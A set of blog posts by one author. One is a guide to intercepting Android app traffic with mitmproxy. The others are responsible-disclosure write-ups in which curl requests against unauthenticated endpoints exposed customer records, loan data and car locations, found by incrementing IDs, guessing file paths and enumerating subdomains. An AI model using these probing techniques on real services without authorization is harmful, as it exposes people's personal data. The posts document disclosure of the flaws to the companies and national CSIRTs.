DEV Community: Andrea Scarpino

Sniffing Android apps network traffic

Andrea Scarpino — Thu, 15 Sep 2022 00:00:00 +0000

Back in the days, it was really easy to sniff the network traffic made by the Apps in Android. You could do it in a few minutes by adding mitmproxy’s certificate and setting the HTTP proxy on your wifi network settings. That was it. But things have changed (for good) and that’s no longer the case. However, I still want to sniff the network traffic made by the Apps in Android.

How? Well, I can no longer use my smartphone to do it, but I can set up the Android emulator, install the application via the Google Play Store and sniff the network traffic it generates on my PC \o/

Let’s get started. First, install the Android SDK and create an Android virtual device using Android API 30 and x86 architecture (any API and any architecture is fine). However, we need an image without Google Play Store preinstalled as we need a writable /system folder to inject mitmproxy’s certificate later. That’s okay, because we’ll install the Play Store manually.

echo no | ./Android/Sdk/tools/bin/avdmanager create avd -n Pixel_5_API_30 --abi google_apis/x86 --package 'system-images;android-30;google_apis;x86'

Start the virtual device with the additional -writable-system flag which permits us to make /system writable. I also have to unset QT_QPA_PLATFORM=because I’m on wayland and the emulator doesn’t support it.

QT_QPA_PLATFORM= ./Android/Sdk/emulator/emulator @Pixel_5_API_30 -writable-system

Now let’s download the OpenGAPPs that match our API and architecture. Select the pico variant because we don’t need anything else, just the Play Store.

curl -OL 'https://master.dl.sourceforge.net/project/opengapps/x86/20220503/open_gapps-x86-11.0-pico-20220503.zip'

We’ve to decompress it in order to get and push Phonesky.apk to the virtual device. We also need to whitelist its permissions (thank you to the MinMicroGguys).

unzip open_gapps-x86-11.0-pico-20220503.zip
lzip -d Core/vending-x86.tar.lz
tar xf vending-x86.tar
adb root
adb shell avbctl disable-verification # adb disable-verity makes the emulator crash
adb reboot
adb wait-for-device
adb root
adb remount
adb push vending-x86/nodpi/priv-app/Phonesky/Phonesky.apk /system/priv-app/
curl -O https://raw.githubusercontent.com/FriendlyNeighborhoodShane/MinMicroG/master/res/system/etc/permissions/com.android.vending.xml
adb push com.android.vending.xml /system/etc/permissions/

Now, create a dedicated user to run mitmproxy as it’s written in the documentation:

sudo useradd --create-home mitmproxyuser
sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 443 -j REDIRECT --to-port 8080
sudo -u mitmproxyuser -H bash -c 'mitmproxy --mode transparent --showhost --set block_global=false'

Mandatory copy’n’paste from the mitmproxy documentation page: > Note, as soon as you add the iptables rules, you won’t be able to perform successful network calls until you start mitmproxy.

At this point we are almost there, we just need another step to add the mitmproxy certificate as it’s written in the documentation page:

hashed_name=`sudo openssl x509 -inform PEM -subject_hash_old -in ~mitmproxyuser/.mitmproxy/mitmproxy-ca-cert.cer | head -1`
sudo adb push ~mitmproxyuser/.mitmproxy/mitmproxy-ca-cert.cer /system/etc/security/cacerts/$hashed_name.0
adb shell chmod 664 /system/etc/security/cacerts/$hashed_name.0
adb reboot

You should now have the Play Store, login with your Google account and install the App you need.

That’s it! Happy sniffing!

I went out for dinner and I took some endpoint

Andrea Scarpino — Fri, 25 Feb 2022 00:00:00 +0000

Three weeks ago I went out to a pub for dinner. Due to covid restrictions there are no paper menus anymore and the waitress gave me a card to place my order.

The card she gave me had a QR code and a 5-digit number. I scanned the QR code and opened the website it pointed to. To login I used that 5-digit number. I placed my order. So far so good.

When suddenly a hamburger button caught my attention. I pressed it, but mostly I clicked on the first item in the menu because, judging by its text, it seemed “nice” to have a look at the order I had just placed:

Uh?! 4751€?! Definitely not me! To my surprice that page listed many orders, not just mine, and they were also old. That’s interesting.

Once back home, I wanted to understand it more. I opened the website in my browser, but I failed to login because my 5-digit number “expired”, then I gave it a few tries by increasing it and it worked :-)

I took a look at the JavaScript files to find the one that makes the request to retrieve the orders:

$.ajax({
  type: "POST",
  url: '/include/ajax.php?f=getlist&t=orders',
  data: {
    src:[
      {
        name:"self_cart_id",
        value:app.table_id,
        compare:"equal"
      }
    ],
    orderby: "id DESC"
  }

Let’s do the same request, changing the value (app.table_id) parameter and see what happens:

curl 'https://$HOST/include/ajax.php?f=getlist&t=orders' -X POST --data-raw "src%5B0%5D%5Bname%5D=self_cart_id&src%5B0%5D%5Bvalue%5D=1&src%5B0%5D%5Bcompare%5D=equal&orderby=id+DESC"

I got fewer orders. Then I increase the table_id and I got even less orders. Mmm, I take a second look at the parameters and then I realize that’s a query statement! At this point I played a bit with the parameters until I removed the value parameter completly. Well, now I got 347752 orders and they are even paginated:

"success": 1,
"pag": "1",
"per_pag": 500,
"total_records": 347752,
"total_pages": 696,

Fortunately, there was no sensitive information. I got all the orders made in the last ~2 years from all the pubs scattered around italy (the pub is part of a franchising), but nothing sensitive.

Back to the JavaScript file, there were few interesting calls:

    url: '/include/ajax.php?f=get&t=customers&id='+app.customer_id,
    url: '/include/ajax.php?f=edit_customer&t=self_cart&id='+app.table_id,
    url: '/include/ajax.php?f=getlist&t=categories',
    url: '/include/ajax.php?f=getlist&t=products',
    url: '/include/ajax.php?f=get&t=products&id='+$(this).attr("data-id"),
    url: '/include/ajax.php?f=edit_product&t=self_cart&id='+app.table_id,

I tried with the most tempting, customers, and here we go:

curl 'https://$HOST/include/ajax.php?f=getlist&t=customers'

"success": 1,
"pag": 1,
"per_pag": 500,
"total_records": 11928,
"total_pages": 24,
"rows": [
    {
        "surname": "<REDACTED>",
        "name": "<REDACTED>",
        "email": "<REDACTED>",
        "mobile": "<REDACTED>",
        "addresses": [
            {
                "name": "<REDACTED>",
                "surname": "",
                "address": "<REDACTED>",
                "zipcode": "<REDACTED>",
                "city": "<REDACTED>",
                "province": "<REDACTED>",
                "coord": "44.6<REDACTED>, 10.6<REDACTED>",
                "doorphone": "<REDACTED>",
                            }
        ]
        "barcode": "https:\/\/api.$ANOTHER_HOST\/include\/barcode.php?f=png&s=code-128&d=1",

That single request returned 500 out of 11928 results that include full names, phone numbers and addresses of real persons.

Back to the JavaScript file, the edit_product call is also very tempting (what if I change the price of a product, place my order, and then restore the original price?), but I had already eaten dinner and didn’t try it.

Finally, the $ANOTHER_HOST domain got my attention because it points to a different domain. I googled it and I then realized that this pub was using an e-commerce made by a company that claims on their website that they serve 570 restaurants in Italy. Which makes that 11928 way larger.

To confirm this, I first googled the footer text in the e-commerce and actually found ~100 other websites using it that are affected by the same issue. Then, I found others using DNS enumeration targeting the $ANOTHER_HOST domain.

I warned the company about the unauthenticated endpoints and the possible data leak affecting them and their customers. They politely replied that they don’t provide bug bounties and the endpoints have been patched.

I'm back in the boat

Andrea Scarpino — Fri, 11 Jun 2021 00:00:00 +0000

In mid-2014 I first heard about Jolla and Sailfish OS and immediately bought a Jolla 1; wrote apps; participated in the IGG campaign for Jolla Tablet; bought the TOHKBD2; applied for (and got) Jolla C.

Sounds like the beginning of a good story doesn’t it?

Well, by the beginning of 2017 I had sold everything (except the tablet, we all know what happened to that one).

So what happened?? I was a happy Sailfish user, but Jolla’s false promises disappointed me.

Yet, despite all that, I still think about Sailfish OS to this day. I think it’s because, despite some proprietary components, the ecosystem around Sailfish OS is ultimately open source. And that’s what interests me. It also got a fresh update which solves some of the problems that where there 5 years ago.

Nowadays, thanks to the community , Sailfish OS can be installed on many devices, even if with some less components, but I’m looking for that complete experience and so I asked on the forum if there was someone willing to sell his Xperia device with or without the license… and I got one for free. Better still, in exchange for some apps!

To decide which applications to create, I therefore took a look at that ecosystem. I started with the apps I use daily on Android and looked for the Sailfish OS alternative (spoiler: I’m impressed, good job guys!).

I am writing them all here because I am sure it will be useful to someone else:

AntennaPod (podcast app) -> PodQast
Ariane (gemini protocol browser)
AsteroidOS (AsteroidOS sync) -> Starfish
Connectbot (ssh client) -> built-in (Terminal)
Conversation (xmpp client) -> built-in (Messaging)
Davx5 (caldav/cardav) -> built-in (Account)
DroidShows (TV series) -> SeriesFinale
Element (Matrix client) -> Determinant
Endoscope (camera stream)
Fedilab (Mastodon client) -> Tooter
ForkHub (GitHub client) -> SailHub
FOSS Browser -> built-in (Browser)
FreeOTP -> SailOTP
Glider (hacker news reader) -> SailHN
K-9 Mail -> built-in (Mail)
KDE Connect (KDE sync) -> SailfishConnect
Keepassx (password manager) -> ownKeepass
Labcoat (GitLab client)
Lemmur (Lemmy client)
MasterPassword (password manager) -> MPW
MuPDF (PDF reader) -> built-in (Documents)
Newpipe (YouTube client) -> YTPlayer
Nextcloud (Nextcloud files) -> GhostCloud
Notes (Nextcloud notes) -> Nextcloud Notes
OCReader (Nextcloud RSS) -> Fuoten
OsmAnd~ (Maps) -> PureMaps
Printing (built-in) -> SeaPrint
QuickDic (dictionary) -> SailyDict
RedMoon (screen color temperature) -> Tint Overlay
RedReader (Reddit client) -> Quickddit
Signal -> Whisperfish
Syncthing (files sync) -> there’s the binary, no UI
Transdroid (Trasmission client) -> Clutch
Vinyl (music player) -> built-in (Mediaplayer)
VLC (NFS streaming) -> videoPlayer
WireGuard (VPN) -> there’s the binary, no UI
YetAnotherCallBlocker (call blocker) -> Phonehook

So, to me it looks like almost everything is there, except:

a gemini protocol browser
a client for GitLab
a client for Lemmy
a UI for Syncthing
a UI for Wireguard

I’ve already started to write a UI for Syncthing, then maybe I could write the browser for the gemini protocol or rather the GitLab client?

Please consider a donation if you would like to support me (mention your favourite project!).

Many many thanks to Jörg who sent me his Sony Xperia 10 Plus! I hope I don’t disappoint him!

Sharing your loan details to anyone

Andrea Scarpino — Mon, 24 May 2021 00:00:00 +0000

A week ago, I blogged about a vulnerability in a platform that would allow anyone to download users’ amortisation schedules. This was a critical issue, but it wasn’t really exploitable in the wild as it included a part where you had to guess the name of the document to download.

I no longer trust that platform so I went to their website to remove my loan data from it, but apparently this isn’t possibile via the UI.

I also opened a ticket on their support platform to request removal and they replied that it isn’t possible.

So I went to their website with the intention of replacing the data with a fake one… but there was no longer an edit button!

I’m sure it was there before and in fact the code also confirms that it was there:

However, the platform is based on Magento and so, starting from the current URL, we can easily guess the edit URL, e.g. https://<host>/anagraficamutui/mutuo/edit/id/<n>.

Let’s try 1… bingo!

But wait a minute… this isn’t my loan! Luckily it’s just a demo entry put in by some developer:

Even though it’s a dummy page, we can already see the details of the loan such as the (hopefully) fake IBAN, or the loan total and loan number and even the bank contact person name and email address.

And now take a look at this: if I try to access that page in private mode, then I get the login page. All (almost) well, right?

Nope. Let’s try the same request via curl:

$ curl -s https://<host>/anagraficamutui/edit/id/1 | grep banca

<input type="text" name="istituto_credito" id="istituto_credito" value="banca acme" title="Nome istituto" class="input-text istituto_credito required-entry" />

$ curl -s https://<host>/anagraficamutui/edit/id/1 | grep NL75

<input type="text" name="iban" id="iban" value="NL75xxxxxxxxx" title="Iban" class="input-text iban required-entry validate-iban validate-length maximum-length-27 validate-alphanum" />

Wait a minute, what’s going on?

Well, it turns out that the page sets the location header to redirect you to the login page when there’s no cookie, otherwise it prints the HTML page!

$ curl -s https://<host>/anagraficamutui/edit/id/1 -I | grep location

location: https://<host>/customer/account/login/

Oh-no!

Conclusion

Data from 5723 loans could have been exposed by accessing a specific URL. Details such as IBAN, loan number, loan total and the bank account contact person could have been used to perform spear phishing attacks.

I reported this privacy flaw to the CSIRT Italia and the platform’s DPO. The issue has been solved after 2 days, but I still haven’t heard from them.

Sharing your amortisation schedule to anyone

Andrea Scarpino — Wed, 19 May 2021 00:00:00 +0000

Last month, my company allowed me to claim some benefits through a dedicated platform. This platform is specifically built for this purpose and allows you to recover these benefits not only in the form of coupons or discount codes, but also as reimbursements for medical visits or interest on mortgage payments.

I wanted to try the latter.

I logged on to the platform and then I filled in all the (many) details about the loan that the plaform asks you to fill in, until I had to upload my amortisation schedule which contains a lot of sensitive data. In fact, a strange thing happened at this step: my file was named document.pdf, but after uploading it was renamed to document_2.pdf.

How do I know? Well, let’s have a look to the UI:

It clearly shows the file name and that’s also a hyperlink. Let’s click then.

The PDF opens in my browser. This is expected, but what happens if we take the URL and try to open it in a private window?? Guess what?

You guessed it.

Let’s have a look to the URL again. It’s in the form: https://<host>/media/mutuo/file/d/o/document_2.pdf.

That’s tempting, isn’t?

I wanted to have some fun and I tried the following:

Both the curl output and the checksums are enough to understand that some document has been downloaded there (but discarded since I didn’t download them to my disk…).

Thus, since the d and o parent folders match the two initial letters of my file, I successfully tried with stuff like:

/c/o/contratto.pdf, /c/o/contratto_2.pdf, …
/c/o/contract.pdf, …
/p/r/prospetto.pdf, …

and it does also work with numbers too (to find this out I had to upload a file named 1.pdf 😇), e.g. https://<host>/media/mutuo/file/1/_/1_10.pdf.

Conclusion

If you have uploaded your amortisation schedule to this platform, that in its website says it has more than 300k users from 3k different companies, well someone may have downloaded it.

I reported this privacy flaw to the CSIRT Italia via a PGP encrypted email; the CSIRT is supposed to write to the company that owns the platform to alert them to the problem, but a week later I still hadn’t heard from either of them. So after a week I pinged the CSIRT again, and they replied with a plain text email telling me that they had opened an internal ticket and were nice enough to embed my initial PGP encrypted email.

Two weeks later (about 21 days since my first mail) the platform fixed the problem (the uploaded file path isn’t deterministic anymore and authentication is in place), but I still haven’t heard from them.

Addendum

Since <host> is a third-level domain in my case, I used stuff like Sublist3r and Amass to perform DNS enumeration and I found ~50 websites, 30 of which are aliases pointing to the same host. In fact, I could replace <host> with each of them and I would always download my document_2.pdf file.

How my car insurance exposed my position

Andrea Scarpino — Thu, 11 May 2017 00:00:00 +0000

As many car insurances companies do, my car insurance company provides a satellite device that can be put inside your car to provide its location at any time in any place.

By installing such device in your car, the car insurance profiles your conduct, of course, but it could also help the police in finding your car if it gets stolen and you will probably get a nice discount over the insurance price (even up to 40%!). Long story short: I got one.

Often such companies also provide an “App” for smartphones to easily track your car when you are away or to monitor your partner…mine (the company!) does.

Then I downloaded my company’s application for Android, but unluckily it needs the Google Play Services to run. I am a FLOSS evangelist and, as such, I try to use FLOSS apps only and without gapps.

Luckily I’m also a developer and, as such, I try to develop the applications I need most; using mitmproxy, I started to analyze the APIs used by the App to write my own client.

Authentication

As soon as the App starts you need to authenticate yourself to enable the buttons that allow you to track your car. Fair enough.

The authentication form first asks for your taxpayer’s code; I put mine and under the hood it performs the following request:

curl -X POST -d 'BLUCS§<taxpayers_code>§-1' http://<domain>/BICServices/BICService.svc/restpostcheckpicf<company>

The Web service replies with a cell phone number (WTF?):

2§<international_calling_code>§<cell_phone_number>§-1

Wait. What do we already see here? Yes, besides the ugliest formatting ever and the fact the request uses plain HTTP, it takes only 3 arguments to get a cell phone number? And guess what? The first one and the latter are two constants. In fact, if we put an inexistent taxpayer’s code, by keeping the same values, we get:

-1§<international_calling_code>§§-100%

…otherwise we get a cell phone number for the given taxpayer’s code!

I hit my head and I continued the authentication flow.

After that, the App asks me to confirm the cell phone number it got is still valid, but it also wants the password I got via mail when subscribing the car insurance; OK let’s proceed:

curl -X POST -d 'BLUCS§<taxpayers_code>§<device_imei>§<android_id>§<device_brand>-<device_model>_unknown-<api_platform>-<os_version>-<device_code>§<cell_phone_number>§2§<password>§§-1' http://<domain>/BICServices/BICService.svc/restpostsmartphoneactivation<company>

The Web service responds with:

0§<some_code>§<my_full_name>

The some_code parameter changes everytime, so it seems to work as a “registration id”, but after this step the App unlocked the button to track my car.

I was already astonished at this point: how the authentication will work? Does it need this some_code in combination with my password at reach request? Or maybe it will ask for my taxpayer code?

Car tracking

I start implementing the car tracking feature, which allows to retrieve the last 20 positions of your car, so let’s analyze the request made by the App:

curl -X POST -d 'ASS_NEW§<car_license>§2§-1' http://<domain>/BICServices/BICService.svc/restpostlastnpositions<company>

The Web service responds with:

0§20§<another_code>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>§DD/MM/YYYY HH:mm:SS#<latitude>#<longitude>#0#1#1#1-<country>-<state>-<city>-<street>

WTH?!? No header?!? No cookie?!? No authentication parameters?!?

Yes, your assumption is right: you just need a car license and you get its last 20 positions. And what’s that another_code? I just write it down for the moment.

It couldn’t be real, I first thought (hoped) they stored my IP somewhere so I’m authorized to get this data now, so let’s try from a VPN…oh damn, it worked.

Then I tried with an inexistent car license and I got:

-2§TARGA NON ASSOCIATA%

which means: “that car license is not in our database”.

So what we could get here with the help of crunch? Easy enough: a list of car licenses that are covered by this company and last 20 positions for each one.

I couldn’t stop now.

The Web client

This car insurance company also provides a Web client which permits more operations, so I logged into to analyze its requests and while it’s hosted on a different domain, and it also uses a cookie for almost any request, it performs one single request to the domain I previously used. Which isn’t authenticated and got my attention:

curl http://<domain>/<company>/(S(<uuid>))/NewRemoteAuthentication.aspx?RUOLO=CL&ID=<another_code>&TARGA=<car_license>&CONTRATTO=<foo>&VOUCHER=<bar>

This one replies with an HTML page that is shown in the Web client:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
    <title>NewRemoteAuthentication</title>
    <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1" />
    <meta name="CODE_LANGUAGE" Content="C#" />
    <meta name="vs_defaultClientScript" content="JavaScript"/>
    <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie7" />
        <!--<meta content="IE=EmulateIE10" name="ie_compatibility" http-equiv="X-UA-Compatible" />-->
        <meta name="ie_compatibility" http-equiv="X-UA-Compatible" content="IE=7, IE=8, IE=EmulateIE9, IE=10, IE=11" />
</HEAD>
    <body>
    <form name="Form1" method="post" action="/<company>/(S(<uuid>))/NewRemoteAuthentication.aspx?RUOLO=CL&amp;ID=<another_code>&amp;TARGA=<car_license>" id="Form1">
<input type="hidden" name=" __VIEWSTATE" id="__ VIEWSTATE" value="/wEPDwULLTIwNzEwODIsJFNAgEPKAJDIeBsdSpc2libGVnZGRic5McHC9+DqRx0H+jRt5O+/PLtw==" />

            <iframe id="frm1" src="NewRicerca.aspx" width="100%" height="100%"></iframe>

<SCRIPT language="JavaScript">
<!--
self.close
// -->
</SCRIPT>
</form>
</body>
</HTML>

It includes an iframe (sigh!), but that’s the interesting part!!! Look:

From that page you get:

the full name of the person that has subscribed the insurance;
the car model and brand;
the total amount of kilometers made by the car;
the total amount of travels (meant as “car is moving”) made by the car;
access to months travels details (how many travels);
access to day travels details (latitude, longitude, date and time);
access to months statistics (how often you use your car).

There are a lot of informations here and these statistics are available since the installation of the satellite device.

The request isn’t authenticated so I just have to understand the parameters to fill in. Often not all parameters are required and then I tried by removing someone to find out which are really needed. It turns out that I can simplify that as:

curl http://<domain>/<company>/(S(<uuid>))/NewRemoteAuthentication.aspx?RUOLO=CL&ID=<another_code>&TARGA=<car_license>

But there’s still a another_code there…mmm, wait it looks like the number I took down previously! And yes, it’s!

So, http://<domain>/<company>/(S(<uuid>))/NewRicerca.aspx is the page that really shows all the informations, but how do I generate that uuid thing?

I tried by removing it first and then I got an empty page. Sure, makes sense, how that page will ever know which data I’m looking for?

Then it must be the NewRemoteAuthentication.aspx page that does something; I tried again by removing the uuid from that url and to my full surprise it redirected me to the same url, but it also filled the uuid part as path parameter! Now I can finally invoke the NewRicerca.aspx using that uuid and read all the data!

Conclusion

You just need a car license which is covered by this company to get all the travels made by that car, the full name of the person owning it and its position in real time.

I reported this privacy flaw to the CERT Nazionalewhich wrote to the company.

The company fixed the leak 3 weeks later by providing new Web services endpoints that use authenticated calls. The company mailed its users saying them to update their App as soon as possible. The old Web services have been shutdown after 1 month and half since my first contact with the CERT Nazionale.

I could be wrong, but I suspect the privacy flaw has been around for 3 years because the first Android version of the App uses the same APIs.

I got no bounty.

The company is a leading provider of telematics solutions.